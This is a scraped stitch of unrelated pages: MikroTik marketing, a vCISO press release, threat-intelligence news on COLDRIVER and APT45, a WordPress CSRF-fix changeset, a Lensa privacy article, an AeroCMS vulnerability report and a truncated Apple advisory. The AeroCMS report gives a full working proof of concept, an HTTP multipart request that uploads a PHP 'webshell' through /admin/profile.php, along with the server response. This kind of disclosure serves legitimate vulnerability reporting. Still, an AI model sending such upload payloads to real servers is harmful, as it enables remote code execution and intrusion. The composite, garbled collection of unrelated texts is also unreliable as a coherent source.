An issue in the bridge2 component of MikroTik RouterOS v6.40.5 allows attackers to cause a Denial of Service (DoS) via crafted packets.

*   **RB5009**
    
    The ultimate heavy-duty home lab router with USB 3.0, 1G and 2.5G Ethernet and a 10G SFP+ cage. You can mount four of these new routers in a single 1U rackmount space! Unprecedented processing power in such a small form factor.
    
    More details
    
*   **hAP ac³**
    
    Our bestselling home router is back – and it is faster than ever! The hAP ac³ is the Swiss army knife of home networking with Gigabit Ethernet, handy iOS/Android app for easy configuration, PoE, 128 NAND and powerful external high-gain antennas.
    
    More details
    
*   **CCR2116**
    
    Forget about CPU limitations in 10G setups with this powerful 16-core ARM CPU based CCR. Double the performance of our previous 36-core CCR, 6x faster BGP performance. Includes an M.2 PCIe slot.
    
    More details
    
*   **CRS504-4XQ-IN**
    
    Your most affordable, compact, energy-efficient doorway to the world of 100 Gigabit networking. This switch is the next step in upgrading existing 10 or 25 Gigabit networks. Multiple powering options, dual hot-swap power supplies.
    
    More details
    
*   **hAP ax²**
    
    Supercharge your home network with the Gen6 AX wireless. hAP ax² has everything you might need in a primary home access point – and more! Forget endless reviews and comparisons – this is the perfect device for 99% of homes.
    
    More details
    
*   **Chateau 5G ax**
    
    The future of mobile internet. Gen6 AX Wireless, 2.5 Gigabit Ethernet, and the fastest LTE/5G modem with powerful built-in and external antennas. Jack of all trades... master of many!
    
    More details
    
*   **CCR2216-1G-12XS-2XQ**
    
    The new MikroTik flagship with the power of a whole fleet. Unleash the power of 100 Gigabit networking with L3 Hardware Offloading! This router can be a handy drop-in upgrade for existing CCR1072 setups.
    
    More details
    

**Latest videos**

**YOUR MIKROTIK SUBMISSIONS: Spotted In The Wild 2**

Thank you for sending your MikroTik setups - it was super fun to see all the different approaches. Keep them coming - and get your 10 EUR coupon code for our merch store! Daniel's blog: https://blog.danman.eu/minipci-e-dual-usb-card-extender/ James' YouTube channel @TechInTheCityHonolulu

**Ukrainian: cloud services**

Хмарні сервіси - нічого складного!

**WHAT'S NEW IN MIKROTIK?**

**Check out this rack!**

You do not want to miss out on our top secret product, do you? Make sure to watch the video and let us know, is this what you were missing in your life?

**Where it all began**

**MIKROTIK TRAINING**

**Training**

MikroTik training sessions are organized and provided by MikroTik Training Centers at various locations around the World. They are attended by network engineers, integrators and managers, who would like to learn about routing and managing wired and wireless networks using MikroTik RouterOS.

Find out more

**Trainers & Academies**

MikroTik Academies are educational institutions such as universities, technical schools, colleges, vocational schools, and other educational institutions offering semester time based Internet networking courses for their academic students using MikroTik RouterOS as a learning tool.

Open the map

**Graduation**

Every year there are around **2000 - 3000** graduates who have successfully completed a MikroTik courses. Our certificates are recognized world wide and stand for good knowledge about network administration, using RouterBOARD and RouterOS.

Training history

**HARDWARE & SOFTWARE**

**RouterOS**

RouterOS is the operating system of RouterBOARD hardware. It has all the necessary features for an ISP - routing, firewall, bandwidth management, wireless access point, backhaul link, hotspot gateway, VPN server and more. Quick and simple installation and an easy to use interface!

Find out more

**Product catalog**

MikroTik manufactures routers, switches and wireless systems for every purpose, from small office or home, to carrier ISP networks, there is a device for every purpose. See our product catalog for a complete list of our products and their features.

Open catalog

**Distribution**

To purchase our RouterBOARD, CCR, CRS and other products, and also to receive technical support and pre-sales consultation, please contact our wide network of distributors. See the map to find the nearest one.

Find out more

CVE-2023-24094: MikroTik

By Deeba Ahmed
The vCISO Directory comes to answer the increasing need of SMBs to manage their cybersecurity and helps them…
This is a post from HackRead.com Read the original post: First Directory of Virtual CISO Providers Launched by Cynomi

The vCISO Directory comes to answer the increasing need of SMBs to manage their cybersecurity and helps them find and engage with the right vendor.

TEL AVIV, ISRAEL, JUNE 22, 2023  – The industry’s first-ever directory of virtual Chief Information Security Officer service providers has gone live today at www.thevcisodirectory.com.

This extensive list of virtual CISO (vCISO) providers, collated by Cynomi, means that small- and medium-sized businesses (SMBs) can easily tap the expertise of qualified cybersecurity professionals to protect their digital assets and ensure compliance.

Cyberattacks are on the rise, with Check Point Software’s Mid-Year Security Report revealing a 42% global increase in malicious incidents during the first half of 2022. In this climate, strong cybersecurity measures are crucial. However, most small and medium size companies do not have a CISO of their own, usually because they lack the budget to fill such a position.

This problem is compounded by the talent gap that makes it difficult to find individuals with the necessary skill and specialized experience. According to research by Datto, only 50% of SMBs have a dedicated, internal IT person who manages their cybersecurity needs.

To address this gap and help organizations shore up their cyberdefenses, managed service providers (MSPs,) managed security service providers (MSSPs) and consultancies have developed vCISO services.

They enable businesses to avail themselves of the expertise and skills of a professional CISO to improve their cybersecurity posture, while only paying for an agreed scope of work, usually a fraction of the cost of an in-house security expert. Cynomi, by publishing the industry’s first vCISO directory, is making it simple for businesses to access this expanding pool of resources.

At launch, the vCISO directory contains more than 200 listings of U.S.-based providers, together with details on the specific services they offer and the technology platforms they use to guide and implement their security strategies. The directory will be continually updated and expanded globally to incorporate international providers. 

“Thousands of small and mid-sized businesses globally could benefit from the expertise and support of a traditional CISO, but on a more consultative or part-time basis”, said David Primor, co-founder and CEO of Cynomi. “This is where the vCISO services come in. Our new directory enables businesses to find all vCISO service providers in one place and make an informed choice between the different benefits of the many providers available.”

“Couple of years back we weren’t prioritizing our cybersecurity services, but then we started getting consistent security-as-a-service requests,” said Chris Bevil, CISO of InfoSystems, an MSP located in Tennessee, U.S.A. “We realized that setting up a robust vCISO offering was in our best business interest. In the present climate, this has been a significant boost to our business and positioned us as a leading MSP in our region.”

MSPs and MSSPs offering vCISO services that are not yet included in the directory can submit their details for consideration here. 

**About Cynomi**

Cynomi’s AI-driven platform empowers MSSPs, MSPs and consultancies to offer vCISO services to SMEs at scale and provide them with proactive cyber resilience. Combining proprietary AI algorithms with CISO-level knowledge and knowhow, Cynomi’s platform streamlines the vCISO’s work while automating manual time-consuming tasks including risk assessment, compliance readiness, cyber posture reporting, creation of tailored security policies and remediation plans, as well as task management optimization. 

Cynomi helps partners overcome the cybersecurity skill gap and scale their business, allowing them to offer new services, upsell and increase revenues while reducing operational costs. 

Established in 2020 with the vision that every company deserves a CISO, and with a channel-only approach, Cynomi now serves more than 50 partners worldwide. 

To learn more about Cynomi’s solution for MSPs, MSSPs, and cyber consultancies visit www.cynomi.com.

*   Rotem Shemesh, VP of Marketing, Cynomi
*   rotem@cynomi.com

First Directory of Virtual CISO Providers Launched by Cynomi

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.
The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53),

Threat Intelligence / Cyber Espionage

The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.

The Microsoft Threat Intelligence team is tracking under the cluster as **Star Blizzard** (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446.

The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.

Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017.

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

In August 2023, Recorded Future revealed 94 new domains that are part of the threat actor's attack infrastructure, most of which feature keywords related to information technology and cryptocurrency.

Microsoft said it observed the adversary leveraging server-side scripts to prevent automated scanning of the actor-controlled infrastructure starting April 2023, moving away from hCaptcha to determine targets of interest and redirecting the browsing session to the Evilginx server.

The server-side JavaScript code is designed to check if the browser has any plugins installed, if the page is being accessed by an automation tool like Selenium or PhantomJS, and transmit the results to the server in the form of a HTTP POST request.

"Following the POST request, the redirector server assesses the data collected from the browser and decides whether to allow continued browser redirection," Microsoft said.

"When a good verdict is reached, the browser receives a response from the redirection server, redirecting to the next stage of the chain, which is either an hCaptcha for the user to solve, or direct to the Evilginx server."

Also newly used by Star Blizzard are email marketing services like HubSpot and MailerLite to craft campaigns that serve as the starting point of the redirection chain that culminates at the Evilginx server hosting the credential harvesting page.

In addition, the threat actor has been observed using a domain name service (DNS) provider to resolve actor-registered domain infrastructure, sending password-protected PDF lures embedding the links to evade email security processes as well as host the files on Proton Drive.

That's not all. In a sign that the threat actor is actively keeping tabs on public reporting into its tactics and techniques, it has now upgraded its domain generation algorithm (DGA) to include a more randomized list of words when naming them.

Despite these changes, "Star Blizzard activities remain focused on email credential theft, predominantly targeting cloud-based email providers that host organizational and/or personal email accounts," Microsoft said.

"Star Blizzard remains constant in their use of pairs of dedicated VPSs to host actor-controlled infrastructure (redirector + Evilginx servers) used for spear-phishing activities, where each server usually hosts a separate actor registered domain."

**U.K. Sanctions Two Members of Star Blizzard**

The development comes as the U.K. called out Star Blizzard for "sustained unsuccessful attempts to interfere in U.K. political processes" by targeting high-profile individuals and entities through cyber operations.

Besides linking Star Blizzard to Centre 18, a subordinate element within FSB, the U.K. government sanctioned two members of the hacking crew – Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets (aka Alexey Doguzhiev) – for their involvement in the spear-phishing campaigns.

The activity "resulted in unauthorized access and exfiltration of sensitive data, which was intended to undermine UK organizations and more broadly, the UK government," it said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of COLDRIVER's Evolving Evading and Credential-Stealing Tactics

A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country.
Google-owned Mandiant is tracking the activity cluster under a new moniker APT45, which overlaps with names such as Andariel, Nickel Hyatt,

A North Korea-linked threat actor known for its cyber espionage operations has gradually expanded into financially-motivated attacks that involve the deployment of ransomware, setting it apart from other nation-state hacking groups linked to the country.

Google-owned Mandiant is tracking the activity cluster under a new moniker **APT45**, which overlaps with names such as Andariel, Nickel Hyatt, Onyx Sleet, Stonefly, and Silent Chollima.

"APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009," researchers Taylor Long, Jeff Johnson, Alice Revelli, Fred Plan, and Michael Barnhart said. "APT45 has been the most frequently observed targeting critical infrastructure."

It's worth mentioning that APT45, along with APT38 (aka BlueNoroff), APT43 (aka Kimsuky), and Lazarus Group (aka TEMP.Hermit), are elements within North Korea's Reconnaissance General Bureau (RGB), the nation's premier military intelligence organization.

APT45 is notably linked to the deployment of ransomware families tracked as SHATTEREDGLASS and Maui targeting entities in South Korea, Japan, and the U.S. in 2021 and 2022. Details of SHATTEREDGLASS were documented by Kaspersky in June 2021.

"It is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities," Mandiant said.

Another notable malware in its arsenal is a backdoor dubbed Dtrack (aka Valefor and Preft), which was first used in a cyber attack aimed at the Kudankulam Nuclear Power Plant in India in 2019, marking one of the few publicly known instances of North Korean actors striking critical infrastructure.

"APT45 is one of North Korea's longest running cyber operators, and the group's activity mirrors the regime's geopolitical priorities even as operations have shifted from classic cyber espionage against government and defense entities to include healthcare and crop science," Mandiant said.

"As the country has become reliant on its cyber operations as an instrument of national power, the operations carried out by APT45 and other North Korean cyber operators may reflect the changing priorities of the country's leadership."

The findings come as security awareness training firm KnowBe4 said it was tricked into hiring an IT worker from North Korea as a software engineer, who used a stolen identity of a U.S. citizen and enhanced their picture using artificial intelligence (AI).

"This was a skillful North Korean IT worker, supported by a state-backed criminal infrastructure, using the stolen identity of a U.S. citizen participating in several rounds of video interviews and circumvented background check processes commonly used by companies," the company said.

The IT worker army, assessed to be part of the Workers' Party of Korea's Munitions Industry Department, has a history of seeking employment in U.S.-based firms by pretending to be located in the country when they are actually in China and Russia and logging-in remotely through company-issued laptops delivered to a "laptop farm."

KnowBe4 said it detected suspicious activities on the Mac workstation sent to the individual on July 15, 2024, at 9:55 p.m. EST that consisted of manipulating session history files, transferring potentially harmful files, and executing harmful software. The malware was downloaded using a Raspberry Pi.

Twenty-five minutes later, the Florida-based cybersecurity company said it contained the employee's device. There is no evidence that the attacker gained unauthorized access to sensitive data or systems.

"The scam is that they are actually doing the work, getting paid well, and giving a large amount to North Korea to fund their illegal programs," KnowBe4's chief executive Stu Sjouwerman said.

"This case highlights the critical need for more robust vetting processes, continuous security monitoring, and improved coordination between HR, IT, and security teams in protecting against advanced persistent threats."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Shift from Cyber Espionage to Ransomware Attacks

WordPress before 5.2.4 does not properly consider type confusion during validation of the referer in the admin pages, possibly leading to CSRF.

Timestamp:

10/14/2019 03:38:14 PM (3 years ago)

whyisjake

Message:

Administration: Ensure that admin referer nonce is valid.  

Coding standards, ensure that nonce is valid with identical, rather then equal operator.  

Props vortfu, xknown, whyisjake.  

Location:

trunk

Files:

  

*   src/wp-includes/pluggable.php (2 diffs)
*   tests/phpunit/tests/auth.php (2 diffs)

**Legend:**

Unmodified

Added

Removed

*   **trunk/src/wp-includes/pluggable.php**
    
    r46472
    
    r46477
    
     
    
    1107
    
    1107
    
         \*/
    
    1108
    
    1108
    
        function check\_admin\_referer( $action = -1, $query\_arg = '\_wpnonce' ) {
    
    1109
    
     
    
            if ( -1 == $action ) {
    
     
    
    1109
    
            if ( -1 ==\= $action ) {
    
    1110
    
    1110
    
                \_doing\_it\_wrong( \_\_FUNCTION\_\_, \_\_( 'You should specify a nonce action to be verified by using the first parameter.' ), '3.2.0' );
    
    1111
    
    1111
    
            }
    
    …
    
    …
    
     
    
    1126
    
    1126
    
            do\_action( 'check\_admin\_referer', $action, $result );
    
    1127
    
    1127
    
    1128
    
     
    
            if ( ! $result && ! ( -1 == $action && strpos( $referer, $adminurl ) === 0 ) ) {
    
     
    
    1128
    
            if ( ! $result && ! ( -1 ==\= $action && strpos( $referer, $adminurl ) === 0 ) ) {
    
    1129
    
    1129
    
                wp\_nonce\_ays( $action );
    
    1130
    
    1130
    
                die();
    
*   **trunk/tests/phpunit/tests/auth.php**
    
    r45717
    
    r46477
    
     
    
    25
    
    25
    
            self::$user\_id = self::$\_user->ID;
    
    26
    
    26
    
    27
    
     
    
            require\_once( ABSPATH . WPINC . '/class-phpass.php' );
    
     
    
    27
    
            require\_once ABSPATH . WPINC . '/class-phpass.php';
    
    28
    
    28
    
            self::$wp\_hasher = new PasswordHash( 8, true );
    
    29
    
    29
    
        }
    
    …
    
    …
    
     
    
    166
    
    166
    
        }
    
    167
    
    167
    
     
    
    168
    
        public function test\_check\_admin\_referer\_with\_default\_action\_as\_string\_not\_doing\_it\_wrong() {
    
     
    
    169
    
            $this->setExpectedIncorrectUsage( 'check\_admin\_referer' );
    
     
    
    170
    
            // A valid nonce needs to be set so the check doesn't die()
    
     
    
    171
    
            $\_REQUEST\['\_wpnonce'\] = wp\_create\_nonce( '-1' );
    
     
    
    172
    
            $result               = check\_admin\_referer( '-1' );
    
     
    
    173
    
            $this->assertSame( 1, $result );
    
     
    
    174
    
     
    
    175
    
            unset( $\_REQUEST\['\_wpnonce'\] );
    
     
    
    176
    
        }
    
     
    
    177
    
    168
    
    178
    
        /\*\*
    
    169
    
    179
    
         \* @ticket 36361
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2019-17675: Changeset 46477 – WordPress Trac

Are you thinking about uploading some selfies and buying a pack of ‘Magic Avatars’? Consider these expert tips first.

Has the stale selfie that’s served as your profile picture gone a little _too_ long without a refresh? You’ve likely seen friends using the Lensa AI app to create colorful, custom cartoon images of themselves as ethereal fairies or stern astronauts. Prisma Labs, the company behind Lensa, went viral back in 2016 with a similar (albeit less powerful) app that turned smartphone pics into paintings.

The release of Lensa’s “magic avatars” feature is a global hit for the company. Recent advancements in generative artificial intelligence allow the app to produce more impressive and varied results than its predecessor. According to preliminary estimates provided by Sensor Tower, over 4 million people worldwide downloaded the app during the first five days of December. In that same time period, users spent over $8 million in the app.

AI-generated profile pictures have always raised questions about digital privacy, however. If you’re curious whether it’s a good idea to use Lensa, here’s what you should consider before spending money and uploading your selfies.

Always Read the Privacy Policy

Before diving in, take a minute to browse through the privacy policy and the terms of use to get a better understanding of what the app does with your data. “We always have to be aware when our biometric data is being used for any purpose. This is sensitive data. We should be extra cautious with how that data is being used,” says David Leslie, a director of ethics and responsible innovation research at The Alan Turing Institute and professor at the Queen Mary University of London.

Andrey Usoltsev, the CEO and cofounder of Prisma Labs, claimed the company is working to update the privacy policy in an email to WIRED. “Lensa uses a copy of the Stable Diffusion model and teaches it to recognize the face on the uploaded images in each particular case. This means there is a separate model for each individual user,” writes Usoltsev. “The user’s photos are deleted from our servers as soon as the avatars are generated. The servers are located in the US.”

Although it’s impossible to know exactly how a company is using and storing your data without an independent assessment, this statement is a move in the right direction. With that in mind, however, uploads are only a small part of the larger equation.

The Security Implications Beyond Your Uploaded Pics

While biometrics might be your initial concern, it’s also crucial to understand just how much additional data is automatically collected from your smartphone. Lensa may use third-party analytics, log file information, device identifiers, and registered user information to gather data on you. Go to section 3 of the privacy policy to check it out in detail. 

Any user can opt out of that data collection by contacting the company at privacy@lensa-ai.com. If you use an iOS device, you have the option to opt out by going into your privacy settings. To be fair, it’s not just Lensa: Every app on your phone is probably collecting more data than you realize. Even if you decide to trust Lensa with your personal data, it’s quite possible for the data to change hands if the company is acquired in the future. “That especially happens when it goes into bigger companies that are much more adept at bullshitting around how they talk about it,” says Ben Winters, a lead on the AI and human rights projects at the Electronic Privacy Information Center.

Don’t Import Pictures of Children or Nudity

It goes against the terms of use to insert images of children or nudity to generate images on Lensa. But even if you don’t input nudes, women may receive hypersexual results; “the app not only generates nudes but also ascribes cartoonishly sexualized features, like sultry poses and gigantic breasts, to their images. I, for example, received several fully nude results despite uploading only headshots,” writes WIRED contributor Olivia Snow. The app generated disturbing imagery when Snow uploaded her childhood photos, changing what would have been stylized mementos into dehumanizing imagery. “Since the feature is not designed for minors, we advise against using any images of children,” writes Usoltsev.

Lensa can also produce sexual images of adults without their consent. “It’s a potential instance where insufficient forethought has been put into protecting the dignity of individuals,” says Leslie. “When technologies can harm, we’re on the hook to do all that we can to anticipate those impacts.”

Be Prepared for Odd or Offensive Results

It’s not just funky fingers and second heads, you may also receive results that are racist or sexist when you interact with generative AI. “The internet is filled with a lot of images that will push AI image generators toward topics that might not be the most comfortable, whether it’s sexually explicit images or images that might shift people’s AI portraits toward racial caricatures,” says Grant Fergusson, an Equal Justice Works fellow at EPIC. 

Consider the Larger Impact for Real Artists

Some artists are embracing the potential for generative AI to produce fascinating results. Others are much more hesitant about the technology’s potential repercussions. “The commercialization of these image generators will have an impact on the ability for artists to keep sort of sustaining themselves in the long term,” says Leslie. 

Although it’s a more expensive route, those who are able to should consider commissioning smaller artists to create digital pieces for their new profile picture, phone wallpaper, or portrait. Instagram and Twitter are full of artists who work in a variety of styles that you could never get from generative AI, and many of them are eager for commissions. For a nominal fee, you can get something truly unique and personal. You could even ask around at your community art center and support a local artist.

Try Deleting the App Afterward

Let’s say you’ve considered everything above and still decided to spend a couple of bucks to get a pack of “magic avatars.” After you’ve saved the colorful creations, check out the photo- and video-editing capabilities on Lensa. Is this something you want to use often or is it just another app that’ll collect digital dust on your smartphone? “Control the settings, delete after use, and exercise any and all rights that they offer you,” recommends Winters to anyone worried about data collection.

Lensa AI and ‘Magic Avatars’: What to Know Before Using the App

AeroCMS v0.0.1 was discovered to contain an arbitrary file upload vulnerability via the component /admin/profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Hello I want to report an arbitrary file upload vulnerability that I found in AeroCms v0.0.1, through which we can upload webshell and control the web server.

**Step to Reproduct**

After entering the background of website management, click "Profile" to enter the interface of "/admin/profile. PHP", and you can see that the function of uploading pictures exists.  

We create a new webshell file and name it shell.php ：

<?php phpinfo(); ?>

Next, we select the file and click "Updae Profile" to upload the file  

When upload success access **'/images/shell.php'**

**We can see that the file was successfully uploaded and executed**

**Vulnerable Code**

**No file checking before uploading**

**POC**

**Injection Point**

> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_image"; filename="shell.php"  
> Content-Type: image/jpeg

**Request**

> POST /admin/profile.php HTTP/1.1  
> Host: 127.0.0.1:8080  
> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0  
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
> Accept-Encoding: gzip, deflate  
> Content-Type: multipart/form-data; boundary=---------------------------423983190532431556521178267050  
> Content-Length: 1109  
> Origin: http://127.0.0.1:8080  
> Connection: close  
> Referer: http://127.0.0.1:8080/admin/profile.php  
> Cookie: PHPSESSID=dh3hq98sqsj0eapgn43efegfb3  
> Upgrade-Insecure-Requests: 1
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="username"
> 
> 1111  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="password"
> 
> 123.com  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_firstname"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_lastname"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_email"
> 
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_image"; filename="shell.php"  
> Content-Type: image/jpeg
> 
> test is test
> 
> <?php phpinfo();?>  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="user\_role"
> 
> Subscriber  
> \-----------------------------423983190532431556521178267050  
> Content-Disposition: form-data; name="update\_user"
> 
> Update Profile  
> \-----------------------------423983190532431556521178267050--

**response**

> HTTP/1.1 200 OK  
> Date: Wed, 10 Aug 2022 02:45:01 GMT  
> Server: Apache/2.4.10 (Debian)  
> Expires: Thu, 19 Nov 1981 08:52:00 GMT  
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
> Pragma: no-cache  
> Vary: Accept-Encoding  
> Content-Length: 8474  
> Connection: close  
> Content-Type: text/html; charset=UTF-8
> 
>     <meta charset="utf-8">
>     <meta http-equiv="X-UA-Compatible" content="IE=edge">
>     <meta name="viewport" content="width=device-width, initial-scale=1">
>     <meta name="description" content="">
>     <meta name="author" content="">
>     
>     <title>AeroCMS Admin Panel</title>
>     
>     
>     <link href="css/bootstrap.min.css" rel="stylesheet">
>     
>     
>     <link href="css/sb-admin.css" rel="stylesheet">
>     
>     
>     <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
>     
>     
>     
>     
>     
>     <link rel="stylesheet" href="css/styles.css">
>     
>     <script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
>     
>     <script src="https://cloud.tinymce.com/stable/tinymce.min.js"></script>
>     
>     <script src="js/jquery.js"></script>
>     
> 
>     <div id="wrapper">
>     
>         
>         <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation">
>             
>             <div class="navbar-header">
>                 <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-ex1-collapse">
>                     <span class="sr-only">Toggle navigation</span>
>                     <span class="icon-bar"></span>
>                     <span class="icon-bar"></span>
>                     <span class="icon-bar"></span>
>                 </button>
>                 <a class="navbar-brand" href="index.php">AeroCMS</a>
>             </div>
>             
>             <ul class="nav navbar-right top-nav">
>                 
>                 <li><a href='#'>Users Online: <span class="usersonline"></span></a></li>
>                 <li><a href="../index.php">View Site</a></li>
>                 
>                 <li class="dropdown">
>                     <a href="#" class="dropdown-toggle" data-toggle="dropdown"><i class="fa fa-user"></i>  <b class="caret"></b></a>
>                     <ul class="dropdown-menu">
>                         <li>
>                             <a href="#"><i class="fa fa-fw fa-user"></i> Profile</a>
>                         </li>
>                         <li class="divider"></li>
>                         <li>
>                             <a href="../includes/logout.php"><i class="fa fa-fw fa-power-off"></i> Log Out</a>
>                         </li>
>                     </ul>
>                 </li>
>             </ul>
>             
>             <div class="collapse navbar-collapse navbar-ex1-collapse">
>                 <ul class="nav navbar-nav side-nav">
>                     <li>
>                         <a href="index.php"><i class="fa fa-fw fa-dashboard"></i> Dashboard</a>
>                     </li>
>                     
>                     <li>
>                         <a href="javascript:;" data-toggle="collapse" data-target="#posts_dropdown"><i class="fa fa-fw fa-arrows-v"></i> Posts <i class="fa fa-fw fa-caret-down"></i></a>
>                         <ul id="posts_dropdown" class="collapse">
>                             <li>
>                                 <a href="./posts.php">View All Posts</a>
>                             </li>
>                             <li>
>                                 <a href="./posts.php?source=add_post">Add Posts</a>
>                             </li>
>                         </ul>
>                     </li>
>     
>                     <li>
>                         <a href="./categories.php"><i class="fa fa-fw fa-wrench"></i> Categories</a>
>                     </li>
>     
>                     <li>
>                         <a href="./comments.php"><i class="fa fa-fw fa-file"></i> Comments</a>
>                     </li>
>                     <li>
>                         <a href="javascript:;" data-toggle="collapse" data-target="#users"><i class="fa fa-fw fa-arrows-v"></i> Users <i class="fa fa-fw fa-caret-down"></i></a>
>                         <ul id="users" class="collapse">
>                             <li>
>                                 <a href="./users.php">View All Users</a>
>                             </li>
>                             <li>
>                                 <a href="./users.php?source=add_user">Add User</a>
>                             </li>
>                         </ul>
>                     </li>
>                     <li>
>                         <a href="./profile.php"><i class="fa fa-fw fa-file"></i> Profile</a>
>                     </li>
>                 </ul>
>             </div>
>             
>         </nav>
>     
>         <div id="page-wrapper">
>     
>             <div class="container-fluid">
>     
>                 
>                 <div class="row">
>                     <div class="col-lg-12">
>                         <h1 class="page-header">
>                             Welcome to the Admin Panel,
>                             <small>!</small>
>                         </h1>
>     
>                         <form action="" method="post" enctype="multipart/form-data">
>     
>                             <div class="form-group">
>                                     <label for="username">Username</label>
>                                     <input type="text" name="username" value="1111" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                     <label for="password">Password</label>
>                                     <input type="password" name="password" value="123.com" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_firstname">Firstname</label>
>                                 <input type="text" name="user_firstname" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_lastname">Lastname</label>
>                                 <input type="text" name="user_lastname" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_email">Email</label>
>                                 <input type="email" name="user_email" value="" class="form-control">
>                             </div>
>     
>                             <div class="form-group">
>                                 <label for="user_image">Image</label>
>                                 <img class="img-responsive" width="200" src="../images/test2.php" alt="">
>                                 <input type="file" name="user_image" class="form-control">
>                             </div>
>     
>     
>                             <div class="form-group">
>                                 <select name="user_role" class="form-control">
>                                     <option value="Subscriber">Subscriber</option>
>                                 
>                                 <option value='Admin'>Admin</option>                                    
>                                     
>                                     
>                                 </select>
>     
>                             </div>
>     
>                             <div class="form-group">
>                                 <input type="submit" value="Update Profile" name="update_user" class="btn btn-primary">
>                             </div>
>     
>                         </form>
>     
>     
>                     </div>
>                 </div>
>                 
>     
>             </div>
>             
>     
>         </div>
>         
>     
>     </div>
>     
>     
> 
> <script src="js/scripts.js"></script>

**I hope you can fix this vulnerability as soon as possible. I will report this vulnerability to CVE. Looking forward to your reply**

CVE-2022-38305: An arbitrary file upload vulnerability was found · Issue #3 · MegaTKC/AeroCMS

Apple Security Advisory 12-11-2023-2 - iOS 17.2 and iPadOS 17.2 addresses code execution and spoofing vulnerabilities.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256APPLE-SA-12-11-2023-2 iOS 17.2 and iPadOS 17.2iOS 17.2 and iPadOS 17.2 addresses the following issues.Information about the security content is also available athttps://support.apple.com/kb/HT214035.Apple maintains a Security Updates page athttps://support.apple.com/HT201222 which lists recentsoftware updates with security advisories.AccountsAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2023-42919: Kirin (@Pwnrin)AVEVideoEncoderAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to disclose kernel memoryDescription: This issue was addressed with improved redaction ofsensitive information.CVE-2023-42884: an anonymous researcherBluetoothAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An attacker in a privileged network position may be able toinject keystrokes by spoofing a keyboardDescription: The issue was addressed with improved checks.CVE-2023-45866: Marc Newlin of SkySafeEntry added December 11, 2023ExtensionKitAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to access sensitive user dataDescription: A privacy issue was addressed with improved private dataredaction for log entries.CVE-2023-42927: Noah Roskin-Frazee and Prof. J. (ZeroClicks.ai Lab)Find MyAvailable for: iPhone XS and later, iPad Pro 12.9-inch 2nd generationand later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation andlater, iPad Air 3rd generation and later, iPad 6th generation and later,and iPad mini 5th generation and laterImpact: An app may be able to read sensitive location informationDescription: This issue was addressed with improved redaction ofsensitive 